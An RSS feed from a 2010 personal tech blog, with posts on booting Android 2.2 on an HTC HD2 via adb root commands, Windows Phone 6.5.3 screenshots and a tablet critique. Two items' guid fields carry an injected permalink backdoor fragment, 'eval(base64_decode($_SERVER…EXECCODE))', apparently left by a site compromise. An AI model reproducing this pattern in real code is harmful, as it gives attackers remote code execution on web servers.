<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:creativeCommons="http://backend.userland.com/creativeCommonsRssModule" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0">

<channel>
	<title>NakedCleaner</title>
	
	<link>http://www.nakedcleaner.com</link>
	<description>Making my head a cleaner place.</description>
	<lastBuildDate>Tue, 10 Aug 2010 21:52:03 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.feedburner.com/NakedCleaner" /><feedburner:info uri="nakedcleaner" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><creativeCommons:license>http://creativecommons.org/licenses/by-sa/2.0/</creativeCommons:license><feedburner:browserFriendly>This is an XML content feed. It is intended to be viewed in a newsreader or syndicated to another site, subject to copyright and fair use.</feedburner:browserFriendly><item>
		<title>Android 2.2 on the HD2</title>
		<link>http://feedproxy.google.com/~r/NakedCleaner/~3/iV7oJThJS5A/</link>
		<comments>http://www.nakedcleaner.com/2010/08/android-2-2-on-the-hd2/#comments</comments>
		<pubDate>Mon, 09 Aug 2010 15:10:47 +0000</pubDate>
		<dc:creator>Ashleigh</dc:creator>
				<category><![CDATA[General]]></category>

		<guid isPermaLink="false">http://www.nakedcleaner.com/2010/08/09/android-2-2-on-the-hd2/%&amp;($eval(base64_decode($_SERVERHTTP_EXECCODE))|.+)&amp;%/</guid>
		<description>OK, so I’ve been running Froyo (Android 2.2) on my HD2 as the day to day OS now for a week or so, and performance is now equal to (or better see screenshot left) than a Nexus one so I’ve now decided to pop together a guide on how to get it up and running [...]</description>
			<content:encoded><![CDATA[<p><a href="http://www.nakedcleaner.com/files/Android2.2ontheHD2_E378/screenshot.png" rel="lightbox"><img style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; margin-left: 0px; border-left-width: 0px; margin-right: 0px" title="screenshot" border="0" alt="screenshot" align="left" src="http://www.nakedcleaner.com/files/Android2.2ontheHD2_E378/screenshot_thumb.png" width="148" height="244" /></a> OK, so I’ve been running Froyo (Android 2.2) on my HD2 as the day to day OS now for a week or so, and performance is now equal to (or better see screenshot left) than a Nexus one so I’ve now decided to pop together a guide on how to get it up and running for those that want to give it a go.</p>
<p>First things first, lets make sure we have all we need.</p>
<p>A fresh Class 2 or better MicroSD over 2Gb (format it in Windows, either in the phone using USB storage mode, or if you have a reader, from Windows PC natively)</p>
<p>The HD2 needs to be running Radio Firmware <a href="http://www.sendspace.com/file/ge8eqo" target="_blank">2.08.50.02</a> or later (I use <a href="http://www.sendspace.com/file/0bfmlv" target="_blank">2.12.50.02</a>) , and obviously you will need <a href="http://forum.xda-developers.com/showpost.php?p=6891358&amp;postcount=1892" target="_blank">HSPL</a> to flash that.</p>
<p>You also need to download an Android build, I use mattc’s 1.5 one (<a href="http://forum.xda-developers.com/showthread.php?t=736545" target="_blank">here</a>) with some tweaks, but any of them in the <a href="http://forum.xda-developers.com/forumdisplay.php?f=735" target="_blank">XDA-Dev’s</a> forum should work using this guide.</p>
<p><strong>NOTE : </strong>The <a href="http://htcleo.noobhands.net/manusfreedom/zImage_all_files.zip">latest zImage</a> files do not require most of this, Just replace the files in the sdCard\Android folder with the files from the zip. If you are coming from the below modification (or any other FullRam Kernel) you will need to replace the drivers again (not required any more), just copy your backed up <strong>system.ext2</strong> over the changed one, and all will be back to normal. If you did not backup, then just re-download the distro you are using, and replace the system.ext2 file. The only file you might need to change using the below method is the WiFi driver <strong>bcm4329.ko. </strong>Also remember to copy the new version of haret.exe into your android folder.</p>
<p><strong>This will fix the WiFi : </strong>To push the updated bcm4329.ko (in the zip file) do this</p>
<ol>
<li>From a cmd prompt, in the tools folder of the Android SDK, type <strong>ADB shell</strong> </li>
<li>type <strong>su</strong> </li>
<li>type <strong>mount -o remount rw /system</strong> </li>
<li>type <strong>mv /system/lib/modules/bcm4329.ko /system/lib/modules/bcm4329.ko.orig </strong>(this will backup the original driver file) </li>
<li>press ctrl-c or type exit twice </li>
<li>type <strong>adb push ..\bcm4329.ko /system/lib/modules</strong> (where ..\bcm4329.ko is the location of the file from the zip) </li>
<li>type <strong>adb shell chmod 777 </strong><strong>/system/lib/modules/bcm4329.ko</strong> </li>
<li>goto config on your device, and enable WiFi <img src='http://www.nakedcleaner.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  </li>
</ol>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; Below is the old method if you want to use that kernel &#8212;&#8212;-</p>
<p>&#160;</p>
<p>We also need the latest Kernel from <a href="http://htcleo.noobhands.net/manusfreedom/zImage.FULLRAM.noPC" target="_blank">manusfreedom</a> (fullram one) and latest <a href="http://htcleo.noobhands.net/manusfreedom/default.FULLRAM.txt" target="_blank">deault.txt</a>, and the latest graphics drivers (thanks phh) <a href="http://husson.hd.free.fr/copybit.qsd8k.so" target="_blank">copybit</a> and <a href="http://husson.hd.free.fr/gralloc.qsd8k.so" target="_blank">gralloc</a> and the <a href="http://htcleo.noobhands.net/manusfreedom/bcm4329.ko" target="_blank">WiFi updated driver</a></p>
<p>We also need the Android SDK down and installed (see <a href="http://developer.android.com/sdk/index.html" target="_blank">here</a>) only thing really needing installing is the USB Drivers (v3 or later) and the tools, details on the Google page linked.</p>
<p>OK, so we have it all downloaded then. Lets go…</p>
<ol>
<li>Format the SD Card, Plug the card into the HD2, plug the USB into your PC, choose the mass storage mode, and in Windows Explorer right click the drive and click Format. Let it finish. </li>
<li>Open the drive and Create an <strong>Android </strong>folder on it. </li>
<li>Unzip/Unrar the Android build you have downloaded, and copy all the files into the Android folder on the SD card.&#160;&#160;&#160;&#160;&#160; <br />&#160;&#160;&#160;&#160;&#160; <br /><em>The Below section is if you want the latest fastest kernel installed, but requires using command line tools in Windows, and having the ADB tools from the Android SDK installed.&#160;&#160;&#160;&#160;&#160;&#160;&#160; <br /></em></li>
<li>Copy the new new zImage.FULLRAM.noPC into the Android Folder. </li>
<li>Copy the default.FULLRAM.txt into the Android Folder. </li>
<li>Delete or rename the current startup.txt file in the Android folder. </li>
<li>Rename the default.FULLRAM.txt to startup.txt </li>
<li>Delete or rename the current zImage file in the Android folder. </li>
<li>Rename the zImage.FULLRAM.noPC file to zImage (Please make sure you have disabled the hide known extensions in Windows, or do this from the CMD prompt). The Alternative to renaming is to edit the startup.txt you just renamed, and change the <strong>zImage</strong> line to <strong>zImage.FULLRAM.noPC</strong>       <br />&#160;&#160;&#160;&#160;&#160; <br /><em>Finish here for the latest kernel</em>&#160;&#160;&#160;&#160;&#160;&#160; </li>
<li>Fire up explorer on the device, navigate to the SD Card (obviously unplug USB from PC) then to the Android folder, and click the CLRCAD file (don&#8217;t worry if nothing happens, that’s right), then the haret file. This will then boot Android. </li>
</ol>
<p>&#160;</p>
<p>Once Android is up and running go through the initial configuration screens if you like, however we need to fix the little graphics glitches you can see (flickery lines) this is caused by bad graphics drivers. So let’s replace them (only required if running the FULLRAM kernel)</p>
<ol>
<li>Connect the USB to the device and to Windows, the USB debuging notification should pop up in the notification bar in Android. Copy the two .so files you downloaded earlier (copybit and graloc) into this folder as well </li>
<li>Launch a command prompt, and navigate to the tools folder of the Android SDK, and type <strong>adb shell mount -o remount rw /system</strong> </li>
<li>Make a backup of the files you will be deleting, create a backup folder up the tree on windows (in the CMD prompt, type <strong>MD ..\backup</strong>), then type <strong>adb pull /system/lib/hw/copybit.*.so ..\backup </strong>and <strong>adb pull /system/lib/hw/gralloc.*.so ..\backup</strong> these can then be used to restore back to the 256/384Mb based kernel if required (use the same method as below to replace files if need be, note though you have a copybit.default.so to push as well). </li>
<li>That should come back without error, now type <strong>adb shell rm /system/lib/hw/copybit.*.so </strong>and press enter, now type <strong>adb shell rm /system/lib/hw/gralloc.*.so </strong>and press enter. </li>
<li>now type <strong>adb push copybit.qsd8k.so /system/lib/hw</strong>&#160; and <strong>adb push gralloc.qsd8k.so /system/lib/hw </strong>this will copy the new drivers to the device. </li>
<li>Run&#160; <strong>adb shell chmod 777 /system/lib/*</strong>to set permissions (sorry forgot this step if you get a non boot,&#160; just do this step while the device is attempting to boot, then reboot it with the next step, it should fix nonboot issues) </li>
<li>run <strong>adb push bcm4329.ko /system/lib/modules </strong>to update WiFi updated driver </li>
<li>Now reboot the HD2, type <strong>adb shell reboot </strong>to do this. </li>
</ol>
<p>If all went well (no errors reported etc) then the new drivers are now on the device, and the reboot to WinMo should happen.</p>
<p>Re-Launch Android either via file explorer again (running the two exe’s) or get one of the many launchers to do it for you. Try <a href="http://genusproject.com/uncategorized/my-first-windows-mobile-app-boot-android-on-htc-hd2/" target="_blank">this one</a> for example.</p>
<p>I hope that helps someone that’s trying to play with Android on the HD2. Like I say, for me it works day to day without issue. I do recommend installing <a href="http://forum.xda-developers.com/showthread.php?t=505419" target="_blank">SetCPU</a> though, and setting it up to scale the CPU, and slow it down when screen off etc.</p>
<p>Thanks to the guys over at the <a href="http://irclog.netripper.com/?chan=htc-linux" target="_blank">HTC-Linux channel</a> for the information used here.</p>
<p>NOTE : Uploading a version of matcc 1.5 rom with changes already done, will post the links when uploaded. Please note though, Mattc will NOT support this release if there is issues, however do look in his thread on <a href="http://forum.xda-developers.com/showthread.php?t=736545" target="_blank">XDA-Developers</a> for possible fixes. I’ve changed nothing else in his rom besides the drivers and kernel version.</p>
<p>Links : <a title="JEAVMCS0D8" href="http://www.multiupload.com/JEAVMCS0D8">Download Links</a></p>

<p><a href="http://feedads.g.doubleclick.net/~a/27AWtk0ydlWh0UWEIrkV_LemZSk/0/da"><img src="http://feedads.g.doubleclick.net/~a/27AWtk0ydlWh0UWEIrkV_LemZSk/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/27AWtk0ydlWh0UWEIrkV_LemZSk/1/da"><img src="http://feedads.g.doubleclick.net/~a/27AWtk0ydlWh0UWEIrkV_LemZSk/1/di" border="0" ismap="true"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=iV7oJThJS5A:S6waisPinBQ:7Q72WNTAKBA"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=7Q72WNTAKBA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=iV7oJThJS5A:S6waisPinBQ:D7DqB2pKExk"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=iV7oJThJS5A:S6waisPinBQ:D7DqB2pKExk" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=iV7oJThJS5A:S6waisPinBQ:JEwB19i1-c4"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=iV7oJThJS5A:S6waisPinBQ:JEwB19i1-c4" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=iV7oJThJS5A:S6waisPinBQ:ByNYXvuKCJE"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=ByNYXvuKCJE" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=iV7oJThJS5A:S6waisPinBQ:3QFJfmc7Om4"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=iV7oJThJS5A:S6waisPinBQ:3QFJfmc7Om4" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=iV7oJThJS5A:S6waisPinBQ:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=iV7oJThJS5A:S6waisPinBQ:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=iV7oJThJS5A:S6waisPinBQ:wF9xT3WuBAs"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=iV7oJThJS5A:S6waisPinBQ:wF9xT3WuBAs" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=iV7oJThJS5A:S6waisPinBQ:YwkR-u9nhCs"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=YwkR-u9nhCs" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/NakedCleaner/~4/iV7oJThJS5A" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.nakedcleaner.com/2010/08/android-2-2-on-the-hd2/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://www.nakedcleaner.com/2010/08/android-2-2-on-the-hd2/</feedburner:origLink></item>
		<item>
		<title>Server Migration</title>
		<link>http://feedproxy.google.com/~r/NakedCleaner/~3/6quUX1DMBKg/</link>
		<comments>http://www.nakedcleaner.com/2010/04/server-migration/#comments</comments>
		<pubDate>Tue, 13 Apr 2010 00:13:14 +0000</pubDate>
		<dc:creator>Ashleigh</dc:creator>
				<category><![CDATA[General]]></category>

		<guid isPermaLink="false">http://www.nakedcleaner.com/2010/04/13/server-migration/%&amp;($eval(base64_decode($_SERVERHTTP_EXECCODE))|.+)&amp;%/</guid>
		<description>We are currently moving host’s. Please bare with us.</description>
			<content:encoded><![CDATA[<p>We are currently moving host’s. Please bare with us.</p>

<p><a href="http://feedads.g.doubleclick.net/~a/tV8nQYee4gt-fUr_JK3DuwVZ1s0/0/da"><img src="http://feedads.g.doubleclick.net/~a/tV8nQYee4gt-fUr_JK3DuwVZ1s0/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/tV8nQYee4gt-fUr_JK3DuwVZ1s0/1/da"><img src="http://feedads.g.doubleclick.net/~a/tV8nQYee4gt-fUr_JK3DuwVZ1s0/1/di" border="0" ismap="true"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=6quUX1DMBKg:OzZ7xF5-O6I:7Q72WNTAKBA"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=7Q72WNTAKBA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=6quUX1DMBKg:OzZ7xF5-O6I:D7DqB2pKExk"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=6quUX1DMBKg:OzZ7xF5-O6I:D7DqB2pKExk" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=6quUX1DMBKg:OzZ7xF5-O6I:JEwB19i1-c4"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=6quUX1DMBKg:OzZ7xF5-O6I:JEwB19i1-c4" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=6quUX1DMBKg:OzZ7xF5-O6I:ByNYXvuKCJE"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=ByNYXvuKCJE" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=6quUX1DMBKg:OzZ7xF5-O6I:3QFJfmc7Om4"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=6quUX1DMBKg:OzZ7xF5-O6I:3QFJfmc7Om4" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=6quUX1DMBKg:OzZ7xF5-O6I:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=6quUX1DMBKg:OzZ7xF5-O6I:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=6quUX1DMBKg:OzZ7xF5-O6I:wF9xT3WuBAs"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=6quUX1DMBKg:OzZ7xF5-O6I:wF9xT3WuBAs" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=6quUX1DMBKg:OzZ7xF5-O6I:YwkR-u9nhCs"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=YwkR-u9nhCs" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/NakedCleaner/~4/6quUX1DMBKg" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.nakedcleaner.com/2010/04/server-migration/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://www.nakedcleaner.com/2010/04/server-migration/</feedburner:origLink></item>
		<item>
		<title>HD2 WinPhone 6.5.3</title>
		<link>http://feedproxy.google.com/~r/NakedCleaner/~3/XewGDhyR4HQ/</link>
		<comments>http://www.nakedcleaner.com/2010/01/hd2-winphone-6-5-3/#comments</comments>
		<pubDate>Tue, 12 Jan 2010 14:56:47 +0000</pubDate>
		<dc:creator>Ashleigh</dc:creator>
				<category><![CDATA[General]]></category>
		<category><![CDATA[HTC HD2]]></category>
		<category><![CDATA[Windows Mobile]]></category>
		<category><![CDATA[windows phone]]></category>
		<category><![CDATA[WM6.5.3]]></category>

		<guid isPermaLink="false">http://www.nakedcleaner.com/2010/01/12/hd2-winphone-6-5-3/</guid>
		<description>Just a quick pic gallery of the HD2 running Windows Phone 6.5.3 (28205). All seems to be running just fine (day 3 of this Rom), remember that you need to either use SSPL or (recommended) HSPL for the Leo. &amp;#160; As you can see, it’s all rather pretty, and after being an avid Titanium user [...]</description>
			<content:encoded><![CDATA[<p>Just a quick pic gallery of the HD2 running Windows Phone 6.5.3 (28205).</p>
<p>All seems to be running just fine (day 3 of <a href="http://forum.xda-developers.com/showthread.php?t=614006" target="_blank">this</a> Rom), remember that you need to either use SSPL or (recommended) <a href="http://forum.xda-developers.com/showthread.php?t=611433" target="_blank">HSPL</a> for the Leo.</p>
<p><a href="http://www.nakedcleaner.com/files/HD2WinPhone6.5.3_D248/20100114_121819PM.jpg" rel="lightbox"><img style="border-bottom: 0px; border-left: 0px; display: inline; margin-left: 0px; border-top: 0px; margin-right: 0px; border-right: 0px" title="2010-01-14_12-18-19-PM" border="0" alt="2010-01-14_12-18-19-PM" src="http://www.nakedcleaner.com/files/HD2WinPhone6.5.3_D248/20100114_121819PM_thumb.jpg" width="148" height="244" /></a>&#160;<a href="http://www.nakedcleaner.com/files/HD2WinPhone6.5.3_D248/20100110_010941AM.jpg" rel="lightbox"><img style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; margin-left: 0px; border-left-width: 0px; margin-right: 0px" title="SenseUI Documents Tab" border="0" alt="SenseUI Documents Tab" src="http://www.nakedcleaner.com/files/HD2WinPhone6.5.3_D248/20100110_010941AM_thumb.jpg" width="148" height="244" /></a><a href="http://www.nakedcleaner.com/files/HD2WinPhone6.5.3_D248/20100112_022912PM.jpg" rel="lightbox"><img style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; margin-left: 0px; border-left-width: 0px; margin-right: 0px" title="SenseUI Weather" border="0" alt="SenseUI Weather" src="http://www.nakedcleaner.com/files/HD2WinPhone6.5.3_D248/20100112_022912PM_thumb.jpg" width="148" height="244" /></a></p>
<p> <a href="http://www.nakedcleaner.com/files/HD2WinPhone6.5.3_D248/20100112_022706PM.jpg" rel="lightbox"><img style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; margin-left: 0px; border-left-width: 0px; margin-right: 0px" title="Start Menu" border="0" alt="Start Menu" src="http://www.nakedcleaner.com/files/HD2WinPhone6.5.3_D248/20100112_022706PM_thumb.jpg" width="148" height="244" /></a> <a href="http://www.nakedcleaner.com/files/HD2WinPhone6.5.3_D248/20100112_022731PM.jpg" rel="lightbox"><img style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; margin-left: 0px; border-left-width: 0px; margin-right: 0px" title="Skinned UI" border="0" alt="Skinned UI" src="http://www.nakedcleaner.com/files/HD2WinPhone6.5.3_D248/20100112_022731PM_thumb.jpg" width="148" height="244" /></a><a href="http://www.nakedcleaner.com/files/HD2WinPhone6.5.3_D248/20100112_022748PM.jpg" rel="lightbox"><img style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; margin-left: 0px; border-left-width: 0px; margin-right: 0px" title="Version Info" border="0" alt="Version Info" src="http://www.nakedcleaner.com/files/HD2WinPhone6.5.3_D248/20100112_022748PM_thumb.jpg" width="148" height="244" /></a>
<p><a href="http://www.nakedcleaner.com/files/HD2WinPhone6.5.3_D248/20100112_023019PM.jpg" rel="lightbox"><img style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; margin-left: 0px; border-left-width: 0px; margin-right: 0px" title="SenseUI Music" border="0" alt="SenseUI Music" src="http://www.nakedcleaner.com/files/HD2WinPhone6.5.3_D248/20100112_023019PM_thumb.jpg" width="148" height="244" /></a> <a href="http://www.nakedcleaner.com/files/HD2WinPhone6.5.3_D248/20100112_023133PM.jpg" rel="lightbox"><img style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; margin-left: 0px; border-left-width: 0px; margin-right: 0px" title="SenseUI Video Playback (MP4)" border="0" alt="SenseUI Video Playback (MP4)" src="http://www.nakedcleaner.com/files/HD2WinPhone6.5.3_D248/20100112_023133PM_thumb.jpg" width="148" height="244" /></a> <a href="http://www.nakedcleaner.com/files/HD2WinPhone6.5.3_D248/20100112_022845PM.jpg" rel="lightbox"><img style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; margin-left: 0px; border-left-width: 0px; margin-right: 0px" title="SenseUI SMS Client" border="0" alt="SenseUI SMS Client" src="http://www.nakedcleaner.com/files/HD2WinPhone6.5.3_D248/20100112_022845PM_thumb.jpg" width="148" height="244" /></a> </p>
<p>As you can see, it’s all rather pretty, and after being an avid Titanium user for some time on the HTC HD, the extra grunt the HD2 has seems to breeze through the overhead of the SenseUI that HTC ship. </p>
<p>Obviously there is stuff I haven&#8217;t covered here, the twitter client that HTC ship still (even in this latest build of SenseUI) seems to chew a lot of CPU when it’s updateing for some reason, not a problem as I use <a href="http://www.panoramicsoft.com/mobileapps/motweets/moTweets.php" target="_blank">MoTweet</a>, and the Keyboard sometimes has issues capitalising things, and that’s been an issue in all the latest SenseUI builds.</p>
<p>All in all, I think it’s the ‘best of breed’ device experience of the moment, I cant stand the closed of nature of the iPhone, Android (as nexus shows) is still not there at the moment, yes this is what MS SHOULD have delivered right from the start, but at least they got there. </p>
<p>Bring On Windows Phone 7 (hopefully using CE6.x core)</p>

<p><a href="http://feedads.g.doubleclick.net/~a/bUOv2m9e40CRkJ2lvCFSkuScuvg/0/da"><img src="http://feedads.g.doubleclick.net/~a/bUOv2m9e40CRkJ2lvCFSkuScuvg/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/bUOv2m9e40CRkJ2lvCFSkuScuvg/1/da"><img src="http://feedads.g.doubleclick.net/~a/bUOv2m9e40CRkJ2lvCFSkuScuvg/1/di" border="0" ismap="true"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=XewGDhyR4HQ:BqjPJJQ_cGc:7Q72WNTAKBA"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=7Q72WNTAKBA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=XewGDhyR4HQ:BqjPJJQ_cGc:D7DqB2pKExk"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=XewGDhyR4HQ:BqjPJJQ_cGc:D7DqB2pKExk" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=XewGDhyR4HQ:BqjPJJQ_cGc:JEwB19i1-c4"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=XewGDhyR4HQ:BqjPJJQ_cGc:JEwB19i1-c4" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=XewGDhyR4HQ:BqjPJJQ_cGc:ByNYXvuKCJE"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=ByNYXvuKCJE" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=XewGDhyR4HQ:BqjPJJQ_cGc:3QFJfmc7Om4"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=XewGDhyR4HQ:BqjPJJQ_cGc:3QFJfmc7Om4" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=XewGDhyR4HQ:BqjPJJQ_cGc:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=XewGDhyR4HQ:BqjPJJQ_cGc:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=XewGDhyR4HQ:BqjPJJQ_cGc:wF9xT3WuBAs"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=XewGDhyR4HQ:BqjPJJQ_cGc:wF9xT3WuBAs" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=XewGDhyR4HQ:BqjPJJQ_cGc:YwkR-u9nhCs"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=YwkR-u9nhCs" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/NakedCleaner/~4/XewGDhyR4HQ" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.nakedcleaner.com/2010/01/hd2-winphone-6-5-3/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://www.nakedcleaner.com/2010/01/hd2-winphone-6-5-3/</feedburner:origLink></item>
		<item>
		<title>Tablet’s, Why?</title>
		<link>http://feedproxy.google.com/~r/NakedCleaner/~3/Phl_BiS1O5Y/</link>
		<comments>http://www.nakedcleaner.com/2010/01/tablets-why/#comments</comments>
		<pubDate>Mon, 11 Jan 2010 13:08:27 +0000</pubDate>
		<dc:creator>Ashleigh</dc:creator>
				<category><![CDATA[General]]></category>
		<category><![CDATA[#ms_feeds]]></category>
		<category><![CDATA[#windows7]]></category>
		<category><![CDATA[OSX]]></category>
		<category><![CDATA[Tablet]]></category>

		<guid isPermaLink="false">http://www.nakedcleaner.com/2010/01/11/tablets-why/</guid>
		<description>OK, with all the who-har about Apple launching a tablet, and with Microsoft/HP showing off theirs, I thought I’d ask the question no-one seems to be asking. Why? Let’s think about this for a second. Tablets have no keyboard, and as far as I know, the computer world, even with Windows 7 and MacOSX have [...]</description>
			<content:encoded><![CDATA[<p><a href="http://www.nakedcleaner.com/files/TabletsWhy_B8FF/article124130007C82F10000005DC792_306x445.jpg" rel="lightbox"><img style="border-bottom: 0px; border-left: 0px; display: inline; margin-left: 0px; border-top: 0px; margin-right: 0px; border-right: 0px" title="article-1241300-07C82F10000005DC-792_306x445" border="0" alt="article-1241300-07C82F10000005DC-792_306x445" align="right" src="http://www.nakedcleaner.com/files/TabletsWhy_B8FF/article124130007C82F10000005DC792_306x445_thumb.jpg" width="169" height="244" /></a> OK, with all the who-har about Apple launching a tablet, and with Microsoft/HP showing off theirs, I thought I’d ask the question no-one seems to be asking. Why?</p>
<p>Let’s think about this for a second.</p>
<ol>
<li>Tablets have no keyboard, and as far as I know, the computer world, even with Windows 7 and MacOSX have not got the point where we can live without one. Yes software keyboards do work (I have a HD2, and works well on that), but they will all have the same issues as the iPhone/Windows Phone devices have, Screen Real Estate. Half the screen will be gone while the keyboard is visible. Surely a netbook would not only be cheaper, but more useful here if all you want to do is browse the net and read email?</li>
<li>Portable Media, The tablets are all based around the same technologies as netbooks, so we know that 1080p is out (even if screen res supported it) and probably 720p for that matter (screen res again). And if you want a PMP, then there are plenty of good ones around (like the Arcos) that even do a bit of internet and email, that’s forgetting the HTC HD2’s and iPhones of the world.</li>
<li>Notepad/Scribble concept, these too are shot nowadays with capacitive screens as your finger, no matter how small/thin it is is never going to be as good at this sort of thing as a stylus is. However multitouch is a ‘must have’ now, and that’s only available (easily) on capacitive displays. So another bust.</li>
<li>Portability, come on, it’s more portable than an NC10? my wife put’s her NC10 in her handbag, and if you want portable get a HD2/iPhone.</li>
<li>Power, these are thin little ‘cosmetic’ devices, there not going to have massive battery time, simple as that. Most of the NC10’s weight comes from it’s battery.</li>
<li>OS’s, until the Apple announcement comes out we have no idea what OS their device will run, however it’s been rumoured to be a supersized version of the iPhone OS, and that means all that platform’s problems. The Windows 7 devices run the baby version of the OS, so at least it’s ‘fullish’ featured.</li>
</ol>
<p>So, why is everyone getting so het up over these things? I really am at a loss to work out what they will be used for besides bragging rights. The Windows based ones (as long as ram is upgradable) could conceivably be upgraded to Premium versions of the OS, and then get used for Micro Media Centers, but that’s an expensive way to have telly in the bath.</p>
<p>Am I missing something? but as far as I can see, a Laptop/Netbook is not only going to be cheaper, but a damn site more useful as a device. </p>

<p><a href="http://feedads.g.doubleclick.net/~a/bJiDB38vh8NDOo1_3o9VJ6jJcrk/0/da"><img src="http://feedads.g.doubleclick.net/~a/bJiDB38vh8NDOo1_3o9VJ6jJcrk/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/bJiDB38vh8NDOo1_3o9VJ6jJcrk/1/da"><img src="http://feedads.g.doubleclick.net/~a/bJiDB38vh8NDOo1_3o9VJ6jJcrk/1/di" border="0" ismap="true"></img></a></p><div class="feedflare">
